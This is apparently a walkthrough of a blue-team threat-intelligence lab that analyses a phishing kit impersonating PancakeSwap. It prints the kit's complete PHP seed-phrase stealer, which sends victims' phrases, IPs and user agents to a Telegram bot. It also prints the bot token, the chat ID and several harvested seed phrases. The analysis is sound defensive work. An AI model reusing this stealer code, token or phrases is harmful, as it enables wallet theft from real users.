GrabThePhisher — Threat Intel Lab Writeup
Overview
This writeup documents my approach to the lab GrabThePhisher available on the CyberDefenders website, a blue team-focused cyber threat intelligence lab that requires you to examine files related to a phishing kit that was hosted on a compromised server.
Disclaimer
I like to add a brief disclaimer before a writeup to encourage people to attempt the lab before reading this article, since there will obviously be spoilers in this writeup. I believe you will enjoy the lab more if you attempt it yourself first and then come back to this writeup if you get stuck or need a hint. So without any further delay, lets get started!
Scenario
A decentralized finance (DeFi) platform recently reported multiple user complaints about unauthorized fund withdrawals. A forensic review uncovered a phishing site impersonating the legitimate PancakeSwap exchange, luring victims into entering their wallet seed phrases. The phishing kit was hosted on a compromised server and exfiltrated credentials via a Telegram bot.
Your task is to conduct threat intelligence analysis on the phishing infrastructure, identify indicators of compromise (IoCs), and track the attacker’s online presence, including aliases and Telegram identifiers, to understand their tactics, techniques, and procedures (TTPs).
Lab Analysis
Which wallet is used for asking the seed phrase?
The challenge starts by providing us a zipped file which contains files and assets that were used to impersonate the legitimate PancakeSwap exchange. The file index.html is the default landing page for the website and provides multiple default wallet types.
In the list of wallets, only Metamask has a folder titled \metamask in the provided challenge files.
What is the file name that has the code for the phishing kit?
Under the folder titled \metamask is a file called metamask.php which contains the PHP code below.
<?php
$request = file_get_contents("http://api.sypexgeo.net/json/".$_SERVER['REMOTE_ADDR']);
$array = json_decode($request);
$geo = $array->country->name_en;
$city = $array->city->name_en;
$date = date("m.d.Y"); //aaja
/*
With love and respect to all the hustler out there,
This is a small gift to my brothers,
All the best with your luck,
Regards,
j1j1b1s@m3r0
*/
$message = "<b>Welcome 2 The Jungle </b>
<b>Wallet:</b> Metamask
<b>Phrase:</b> <code>" . $_POST["data"] . "</code>
<b>IP:</b> " .$_SERVER['REMOTE_ADDR'] . " | " .$geo. " | " .$city. "
<b>User:</b> " . $_SERVER['HTTP_USER_AGENT'] . "";
sendTel($message);
function sendTel($message){
$id = "5442785564";
$token = "5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10";
$filename = "https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$id."&text=".urlencode($message)."&parse_mode=html";
file_get_contents($filename);
$_POST["import-account__secret-phrase"]. $text = $_POST['data']."\n";;
@file_put_contents($_SERVER['DOCUMENT_ROOT'].'/log/'.'log.txt', $text, FILE_APPEND);
}
?>This PHP script is designed to collect Metamask wallet seed phrases and send them to a Telegram bot controlled by the attacker.
In which language was the kit written?
Based on the file above, the phishing kit was written in PHP.
What service does the kit use to retrieve the victim’s machine information?
Reviewing the the PHP code, we can see a variable declared called $request.
$request = file_get_contents("http://api.sypexgeo.net/json/".$_SERVER['REMOTE_ADDR']);The phishing kit appears to use Sypex Geo API to get the victim’s country and city based on their IP address.
How many seed phrases were already collected?
In the PHP code, we can see that the phishing kit saves the stolen data in log.txt on the attacker's server.
@file_put_contents($_SERVER['DOCUMENT_ROOT'].'/log/'.'log.txt', $text, FILE_APPEND);If we check the folder /log and look at the contents of the file log.txt, we can see how many seed phrases were collected.
number edge rebuild stomach review course sphere absurd memory among drastic total
bomb stairs satisfy host barrel absorb dentist prison capital faint hedgehog worth
father also recycle embody balance concert mechanic believe owner pair muffin hockeyCould you please provide the seed phrase associated with the most recent phishing incident?
Reviewing the contents of the file log.txt, we can also see the most recent seed phrase collected.
father also recycle embody balance concert mechanic believe owner pair muffin hockeyWhich medium was used for credential dumping?
In the PHP code, we can see that, in addition to being appended to the file log.txt, the seed phrase credentials are also dumped to Telegram
$filename = "https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$id."&text=".urlencode($message)."&parse_mode=html";What is the token for accessing the channel?
The PHP code declares a variable titled $token which stores the token for accessing the Telegram channel.
$token = "5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10";What is the Chat ID for the phisher’s channel?
The PHP code declares a variable titled $idwhich stores the chat ID for the Phisher’s Telegram channel.
$id = "5442785564";What are the allies of the phish kit developer?
In the PHP code, we can see a comment, which contains the name of what can assume to be an ally of the phish kit developer.
/*
With love and respect to all the hustler out there,
This is a small gift to my brothers,
All the best with your luck,
Regards,
j1j1b1s@m3r0
*/What is the full name of the Phish Actor?
What is the username of the Phish Actor?
The PHP code provides all the necessary information needed per the Telegram Bot API documentation to recover the threat actors information. The getChat API function can be used to get up-to-date information about the chat, including the threat actors details.
The syntax for retrieving the information can be seen below:
https://api.telegram.org/bot<YOUR_BOT_TOKEN>/getChat?chat_id=<CHAT_ID>We can simply use the ID and token value identified earlier in the PHP code to retrieve the information.
https://api.telegram.org/bot5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10/getChat?chat_id=5442785564This returns a ChatFullInfo object on success, including the full name and username of the Phish Actor.
Conclusion
This was a interesting threat intel lab around analyzing a phish kit. I really enjoyed statically analyzing the PHP code and reverse engineering the telegram API call to uncover the threat actors details. Thank you for reading till the end and I hope you enjoyed this writeup!
